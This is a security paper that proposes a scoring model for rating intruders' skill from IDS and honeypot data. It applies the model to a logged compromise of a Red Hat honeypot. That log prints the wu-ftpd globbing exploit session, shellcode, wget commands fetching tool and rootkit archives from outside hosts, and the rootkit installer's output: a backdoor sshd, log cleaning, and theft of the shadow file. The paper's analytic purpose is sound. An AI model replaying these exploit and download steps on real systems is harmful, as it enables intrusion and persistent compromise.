Rating the Enemy: "How to identify the enemy"

Author: Toby Miller

Purpose

This paper presents a preliminary version of a model for rating the attackers, as well as a justification for doing so and techniques for using the information. There is still more work to be done, and I would appreciate your feedback and constructive suggestions.

This model is designed for IDS analysts and security engineers to use in order to help evaluate attacks, provide better information to upper management and to assist in assessing the threat level to your network. . If you have any recommendations, please contact me at tmiller@va.prestige.net.

The Logic

One of the problems I see in the Intrusion Detection | Honeypot world is the lack of a model that we can use to accurately rank or rate our cyber-threats. Granted, if you use ISS or any other commercial IDS, your alerts may be different colors based on the attack being used against you. The only problem with that system is that the IDS has no clue about your network infrastructure. Therefore in some cases the alert may not be totally accurate.

This paper will provide the generic framework for a model based on using your infrastructure. It also describes some of the categories used in doing the analysis

The Model

The model uses five categories, each having a calculated score that helps the analyst determine the threat level. The categories are:

Operating system and user expertise
Recon/intelligence gathering
Type of attack
Tools used
Destination IP
The Operating System

The operating system category rates the operating systems and the skill level associated with each operating system. The skill level associated with each operating system is important. Why? Most people will only use operating systems with which they are familiar. As a general rule, most people who are inexperienced within the computer world use Windows. Usually, a more experienced or advanced computer user will use Linux or some form of Unix. The operating systems discussed in this paper are rated based on the attacker’s operating system (using passive OS fingerprinting) and the destination operating system (using your own knowledge of the network). The model currently uses eleven operating systems:

Windows 95|98|ME
Windows NT
Windows 2000| XP
Linux 2.2
Linux 2.4
OpenBSD
NetBSD
FreeBSD
Solaris 8
Solaris 2.5 thru 2.7
MAC OS X

For a complete chart of the operating systems please refer to the matrix at the end of this article. If you look at the chart you will see we use a five point scoring system in this and other categories. This provides us with a baseline on how we rank the skill level. The five-point scoring is based on the following criteria:

Script Kiddie. This person is not very skilled and knowledgeable in the computer world.

Basic User. This person has some knowledge of computers. This person still relies on others for his | her attack.

Power User. Still Learning. Understands computers, probably now enough to be considered dangerous.

System Administrator. Knowledgeable in many areas. Understands TCP/IP and some programming languages.

Professional. Know the computer inside and out. Understands TCP/IP, excellent programmer. Does not rely on others for exploits or attacks.

For example, if the attacker is using an OpenBSD machine and is attacking an OpenBSD machine then in this category he would receive a score of 5 points out of 5, where as an attacker that uses a Windows 98 machine to attack a Windows 98 machine would receive a score of 1.

Recon | Intelligence Gathering

I think as security experts we can appreciate good recon. But as security experts we also understand that there are some not-so-good methods for performing recon. In this model we take that into consideration as well. How do we do this? Well, this category is similar to the first category in the way information is rated. I developed a chart that uses two areas in order to assign a grade. The first area is the type of recon. This has eleven different options that we grade. The second area is the attackers operating system.

Why do we include the attacker’s operating system? It’s most likely that an attacker who uses a BSD type of machine for the attack will use more sophisticated techniques then that of a person who uses a Windows machine. Therefore, the operating system helps us narrow the skill level of the attacker down. The following is a list of recon methods I am using:

SYN packet with a packet size less then or equal to 40 bytes (using no options).
SYN packet with a packet size greater the 40 bytes (using options).
FIN scan
X-mass three scan
SYN | FIN scan
TCP connect
RST scan
UDP probe
ICMP

Ok, now that we know what type of recon this model uses, lets look at why some are higher then others (not all scans will have a write-up).

First, we have a SYN packet that is equal to or less then 40 bytes. This type of packet should not be seen on a network. Without going into too much detail, keep in mind that every SYN packet should have at least one TCP option set. That option is the maximum segment size and that is 4-bytes in length, that makes our minimum packets size 44-bytes. With all of that being said; I think that attackers that use programs that send 40-byte packets are not as skilled as some others. Being stealth means that a person can fly under the radar and not be detected. 40-byte packets stand out like a sore thumb.

The next form of intelligence gathering we will look at are the SYN packets with a packet size greater then 40-bytes. To me this is more stealthy then the 40-byte packets. Why? Well, these packets look normal, compared to the 40-byte packets. If I see at 60-byte SYN packet on the network, I will consider that packet normal a lot quicker then I will a 40-byte packet. Enough said (I hope).

I just want to touch on one more topic here: Packets with strange flags set. I do not find these packets stealthy. Why? Well, in today’s world many Firewalls and Intrusion Detection Systems can spot these puppies in no time. Any decent IDS analyst should be raising flags if they see packets like this. Strange flags set in packets are not stealthy and really do not reflect any skill in my opinion.

This category allows for 5 points maximum.

The Attack

This category is one of the most important categories of them all. This is where you really get a good feeling about the skill level of your attacker. Here is how we score this category:

Was the attack applicable to the operating system? Yes =1 No = 0
Has this type of attack been reported before? Yes = 0 No = 1
Is this a new attack Yes = 2 No = 0
Is this a known attack that has been modified? Yes = 1 No = 0
Is this a common attack? Yes = 0 No = 1
Was the attack successful? Yes = 1 No = 0

The attack category is where your attack signature skills come in handy. Lets take a look at the first item. As obvious as this seems, it is a legitimate question. How many times have you seen a Linux attack being used against a Windows NT machine? If it is applicable, then the attacker receives a point. Has the attack been reported before? If you have seen many of these types of attacks described on Dshield, Securityfocus or other lists, you can assume that your attacker has gotten herself a script and is trying to follow the leader. Therefore she receives no points. If the attack is new and you have never seen anything like the attack then you probably need to look a little closer. The attacker gets two (2) points for the new attack.

If the attack is known, but the signature had been modified so that an IDS might not pick it up, your attacker probably has some expertise. Give her a point!

The next one about whether it’s a common attack is similar to the question about whether it’s been reported before. If you can look at the attack and say” That was created by t666.c then your attacker gets a 0.

Finally, if the attack was successful, your attacker took a lucky guess or he was somewhat skillful, he gets a point.

This category allows for a maximum point total of 6 points.

Tools Used

This category is used to gauge the tools the attacker used to cover his trails once the machine has been compromised. It is based on two types of tools: rootkits and worms. The following list shows the tools and the associated score for its use.

Rootkits

Binary based rootkit Score: 1
LKM rootkit Score: 3
Advanced LKM based rootkit: Score: 5
For more information on these types of rootkits click here.
Windows based rootkit Score: 3

Worms

Was it a self-propagated worm? Score: 2
Does it exploit multiple services or exploits? Score: 3
Is it polymorphic? Score: 5
Does the worm cross OS platforms? Score: 5

The maximum points one can receive from this category is 15. I really think this category is self-explanatory. If there is anything I have left out please let me know.

Destination IP

This category gives us an idea of how the destination IP was being used. Lets take a look at the point system for this category:

Was the destination machine up? Yes = 1 No = 0
Latest patches applied? Yes = 2 No = 0
Computer on broadband, no personal or critical data Score: 4
Personal Information located on the attacked server
SSN numbers Score: 5
Credit Card numbers Score: 5
Bank Account numbers Score: 5
Finical numbers and information Score 5
Critical Information located on the attacked server
Data of national interest Score: 5
Data of company interest Score: 5
Network related information Score: 4

This category can total up to 23 points maximum. Why is this important? Well, you really need to understand the importance of the destination IP and what is on the machine in order to truly evaluate an attacker and his intentions. For example, if an attacker is attacking a machine that has absolutely nothing on it and is only connected to the internet by a modem then I would not consider this attacker as much of a threat as a hacker who is trying to attack my HR server with personal information on it and is connected to the internet 24/7. If you have any recommendations, please contact me.

The Final Score

This section calculates the score and begins to rate the skill level of the attacker. The following is the points total:

1-12 = Script Kiddie
12-22= Basic User
22-32 = Power User
33-43 = Sys-Admin
44-54 = Advanced Hacker

Real Life Example

Ok, models are not worth a penny unless we can see how that can be used in the real world. With that being said I recently had one my honeypots hacked. I’ve used this model to rate the attacker.

Lets take a look at the attack and see if we can rate the attacker. Here’s some background: First, I had a Linux 7.2 honeypot set up with thewith the following ports open:

21: Ftp

22: SSH

25: Sendmail

111: Rpc

143: Imap

The attack happened on Jun 7, 2002 at 00:37 in the morning. I had enabled wu-ftp because RedHat 7.2 installs a vulnerable version of wu-ftpd. For those who may have forgotten, there is a globbing vulnerability in wu-ftpd 2.5.0, 2.6.0 and 2.6.1. It was released last November and to exploit it was not all that hard to do. All one needed to do is find an anonymous ftp server and run the exploit. Let’s take a look at what the attacker did:

1) The attacker makes his connection:

00:37:17.464082 xxx.xxx.xxx.xxx.33759 > 10.10.10.40.ftp: S [tcp sum ok] 
     3311804736:3311804736(0) 
     win 5840 <mss 1460,sackOK,timestamp 1469848 0,nop,wscale 0> (DF) 
     (ttl 40, id 19672, len 60)
0x0000	 4500 003c 4cd8 4000 2806 d5cc xxxx xxxx	E..<L.@.(.......
0x0010	 0a0a 0a28 83df 0015 c566 2140 0000 0000	...(.....f!@....
0x0020	 a002 16d0 28d6 0000 0204 05b4 0402 080a	....(...........
0x0030	 0016 6d98 0000 0000 0103 0300          	..m.........

00:37:17.464082 10.10.10.40.ftp > xxx.xxx.xxx.xxx.33759: S [tcp sum ok] 
     4193914002:4193914002(0) ack 3311804737 win 5792 
     <mss 1460,sackOK,timestamp 39380333 1469848,nop,wscale 0> (DF) 
     (ttl 64, id 0, len 60)
0x0000	 4500 003c 0000 4000 4006 0aa5 0a0a 0a28	E..<..@.@......(
0x0010	 xxxx xxxx 0015 83df f9fa 0c92 c566 2141	.............f!A
0x0020	 a012 16a0 3aa2 0000 0204 05b4 0402 080a	....:...........
0x0030	 0258 e56d 0016 6d98 0103 0300          	.X.m..m.....

00:37:17.634082 xxx.xxx.xxx.xxx.33759 > 10.10.10.40.ftp: . 
     [tcp sum ok] 1:1(0) ack 1 win 5840 
     <nop,nop,timestamp 1469866 39380333> (DF) 
     (ttl 40, id 19673, len 52)
0x0000	 4500 0034 4cd9 4000 2806 d5d3 xxxx xxxx	E..4L.@.(.......
0x0010	 0a0a 0a28 83df 0015 c566 2141 f9fa 0c93	...(.....f!A....
0x0020	 8010 16d0 6925 0000 0101 080a 0016 6daa	....i%........m.
0x0030	 0258 e56d                              	.X.m

2) The attacker logs in (using Ethereal):

220 alligator12 FTP server (Version wu-2.6.1-18) ready.
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS mozilla@
230 Guest login ok, access restrictions apply.

3) Attacker begins trying to rename:

RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name
RNFR ././
350 File exists, ready for destination name

4) Attacker begins to glob:

CWD 0000000000000000000000000000(cut for publication)
CWD ~/{.,.,.,.}
250 CWD command successful.
CWD .
250 CWD command successful.
RNFR ././././././././.
350 File exists, ready for destination name
CWD 735073
550 735073: No such file or directory.
CWD 73507
550 73507: No such file or directory.
CWD 7350é
550 7350é: No such file or directory.
RNFR .
350 File exists, ready for destination name
RNFR ./././././././.
350 File exists, ready for destination name

5) Attacker gets what he wants:

CWD ~{
sP
3Û÷ã°F3ÉÍ€jT‹Ü°'±íÍ€°=Í€R±h/Dâø‹Ü°=Í€XjTj(XÍ€j
X™Rhn/shh//bi‰ãRS‰áÍ€áÍ€unset HISTFILE;id;uname -a;
uid=0(root) gid=0(root) groups=50(ftp)

6) Attacker runs script to download tools:

echo 1 ; if [ -f /usr/bin/wget ] ; then /usr/bin/wget http://diablows.org/gold.tgz ; 
  else if [ -f /usr/bin/lynx ] ; 
  then /usr/bin/lynx -dump http://diablows.org/gold.tgz >> gold.tgz ; fi ; fi ; fi
Linux alligator12 2.4.7-10 #1 Thu Sep 6 17:21:28 EDT 2001 i586 unknown
echo 1 ; if [ -f /usr/bin/wget ] ; then /usr/bin/wget http://diablows.org/gold.tgz ; 
  else if [ -f /usr/bin/lynx ] ; 
  then /usr/bin/lynx -dump http://diablows.org/gold.tgz >> gold.tgz ; fi ; fi ; fi

7) Attacker installs rootkit:

CWD ~{

sP
3Û÷ã°F3ÉÍ€jT‹Ü°'±íÍ€°=Í€R±h/Dâø‹Ü°=Í€XjTj(XÍ€j
X™Rhn/shh//bi‰ãRS‰áÍ€áÍ€unset HISTFILE;id;uname -a;
uid=0(root) gid=0(root) groups=50(ftp)
Linux alligator12 2.4.7-10 #1 Thu Sep 6 17:21:28 EDT 2001 i586 unknown
mkdir /usr/.snmp
cd /usr/.snmp
wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
wget arhive.muhahack.com/admin/xxx.tar.gz
ls -al
total 236
drwxr-xr-x    2 root     root         4096 Jun  7 01:13 .
drwxr-xr-x   17 root     root         4096 Jun  7 01:12 ..
-rw-r--r--    1 root     root       226810 May  9 02:41 xxx.tar.gz
tar xvfz xxx.tar.gz
soulsad/
soulsad/bj
soulsad/cleaner
soulsad/crypt
soulsad/etc/
soulsad/etc/ssh_host_key.pub
soulsad/etc/ssh_random_seed
soulsad/etc/ssh_host_key
soulsad/etc/sshd_config
soulsad/instmod
soulsad/lsn
soulsad/pg
soulsad/rcp
soulsad/rpass
soulsad/setup
soulsad/sshd
soulsad/sz
soulsad/td
soulsad/utime
soulsad/wget
soulsad/x.conf
rm -rf xxx.tar.gz
cd soulsad
./setup Marianne
0;36mRedHat Linux Rootkit mv0.6 Recompiled By Trixx_ro - \ 
  You dont have the right to judge me!
********************************************************************************** \
  We are now preparing the server***********************************
Installing from /usr/.snmp/soulsad - You have to erase /usr/.snmp/soulsad after install
Checking for existing rootkits..
Installing on RedHat Linux V 7.2 with i586 CPU
***Using Password*****
File processed...
Creating Backups...su ping du passwd find netstat lsof***************************
*************************Instaling Trojans********************************
************************************************************************
ERROR: ./login Does not exist
************************************************************************ Instaling sshd
Instaling Telnetd Server 
ERROR: ./telnetd Does not exist
Mtelnetd
./su Does not exist
 suERROR: ./ping Does not exist
 pingERROR: ./du Does not exist
 duERROR: ./passwd Does not exist
 passwdERROR: ./find Does not exist
 findERROR: ./netstat Does not exist
 netstatERROR: ./lsof Does not exist
 lsofERROR: ./in.ftpd Does not exist
 in.ftpdERROR: ./named Does not exist
 namedStopping named: [FAILED]
Starting named: [  OK  ]
ERROR: ./ps Does not exist
Copying extra tools to RKdir 
************************************************************************ \
  cleaner sz rcp pg crypt utime wget instmod secure.sh checkrk socklist
Unpacking and copying some files 
Done.
Installing Sniffer …Done.
Killing some unusefull services ...
Trying to patch some shits ...
Done with the procedure of hacking ...
Continue ...
Cleaning the logs
Log cleaner  By: Tragedy/Dor
OS detection....
Detected Linux
---<[ Log cleaning in process....
Cleaning mboot.log 
Cleaning cron 
Cleaning dmesg 
Cleaning htmlaccess.log 
Cleaning ksyms
Cleaning maillog 
Cleaning messages 
Cleaning mysqld.log 
Cleaning netconf.log 
Cleaning rpmpkgs 
Cleaning secure 
Cleaning xferlog 
Linux detected... rehashing syslog
Getting desired information ...
Geting the uname -a ...
Geting the ifconfig -a ...
Geting the uptime info...
Geting the cpuinfo ...
Geting the passwd file ...
Geting the shadow passwd file ...
Geting the hard disk free ...
Geting the CPU memory ...
Sending yahoo pings ...
Done!
 Rootkit installation Completed in 4 Seconds.
Password: Marianne
SSH port:3012:Password:Marianne
alligator12 - Linux 2.4.7-10 - CPU: i586
Forgive me Father ... for i have sinned.
******************************************************************* \ 
  DON'T FORGET TO DELETE RKDIR: rm -rf /illogic* 
BEFORE YOU LOGOUT!
cd ..
rm -rf *

Rating the attack

Based on the scoring system, the attacker appears to be a script kiddie:

Operating System Score: Linux to Linux = 3
Recon Intel Score: 0 (attacker did no apparent recon)
The Attack = 2
Tools used = 1. For the record, when the attacker never bothered checking to see if the rootkit’s binaries installed. Between us… they did not.
Destination IP: 5
Final Score: 11 = Script Kiddie

To Do | Issues

Ok, this is the part of the paper where I request the community’s input on this model. I think I have covered a lot in this model but there is no way I have covered everything. The following items are on my to-do list for continuing work on developing the model:

Include timetable in scanning for Recon | Intel gathering. Example, fast scanning vs. slow type of scanning.
Watching the attacker on the box itself. Example, if an attacker requires a rootkit to cover his tracks vs. ensuring for himself that he is not being “used”.
Refine the point system.
Eventually automate the system. I would like to see this used in conjunction with SNORT or something like that.
Be able to create a clearer profile of the attacker . The FBI is able to profile murders and rapist, why can’t we profile hackers? There are many different ways to do this. We just need to become familiar with the technologies.
Spoofing. What do we do about spoofing? For example, in the real life example I gave the guy 0 points because of no apparent recon. How do we really know that? How can we rate this?

This is a small list of what I think needs to be done with the model. If you have any constructive comments or suggestions please e-mail me at tmiller@va.prestige.net.

Operating System Matrix

Operating System
Victim's OS Win 95|98|ME Win NT Win 2000| XP Linux 2.2 Linux 2.4 OpenBSD NetBSD FreeBSD Solaris 8 Solaris 2.5=2.7 MAC OS X

Attacker OS

Win 95|98|ME 1 2 2 2 2 2 2 2 2 2 2

Win NT 2 3 3 3 3 3 3 3 3 3 3

Win 2000| XP 2 3 3 3 3 3 3 3 3 3 3

Linux 2.2 2 4 4 4 4 4 4 4 4 4 4

Linux 2.4 2 4 4 4 3 4 4 4 4 4 4

OpenBSD 5 5 5 5 4 5 5 5 5 5 5

NetBSD 5 5 5 5 4 5 5 5 5 5 5

FreeBSD 5 5 5 5 4 5 5 5 5 5 5

Solaris 8 4 4 4 4 4 5 4 4 4 4 4

Solaris 2.5=2.7 4 4 4 4 4 5 4 4 4 4 4

MAC OS X 4 4 4 4 4 4 4 4 4 4 4

Key:
5 = Advanced hacker. Could be very well skilled. Most people who maintain this operating system are knowledgable in network administration and various programming languages.
4= System Administration. This user is semi-advanced. Not as polished with the admin and programming skills.
3= Power User. Still learning. Can move around using a shell. Does not need a gui to get the job done.
2= Basic User. This person understands the basics. Ask this person to set up anything complicated and you will recieve a strange look in return.
1= Script Kiddie. Need I say more.

Recon
Attackers Recon SYN Packet =40 SYN Packet < 40 FIN Scan X-mass Tree SYN|FIN TCP Connect RST Scan UDP Scan ICMP Other

Attackers OS

Win 95|98|ME 1 2 2 2 2 2 2 2 2 2

Win NT 1 2 2 3 3 4 3 3 3 3

Win 2000| XP 1 3 3 3 3 4 4 3 3 3

Linux 2.2 1 4 4 3 3 4 3 4 4 3

Linux 2.4 1 4 4 3 3 4 3 4 4 3

OpenBSD 1 5 4 3 3 5 4 4 4 4

NetBSD 1 5 4 3 3 5 4 4 4 4

FreeBSD 1 5 4 3 3 5 4 4 4 4

Solaris 8 1 4 4 3 3 5 4 4 4 4

Solaris 2.5=2.7 1 4 4 4 4 5 4 4 4 4

MAC OS X 1 4 4 4 4 4 4 4 4 4
Key:
5 = Advanced hacker. Could be very well skilled. Most people who maintain this operating system are knowledgable in network administration and various programming languages.
4= System Administration. This user is semi-advanced. Not as polished with the admin and programming skills.
3= Power User. Still learning. Can move around using a shell. Does not need a gui to get the job done.
2= Basic User. This person understands the basics. Ask this person to set up anything complicated and you will recieve a strange look in return.
1= Script Kiddie. Need I say more.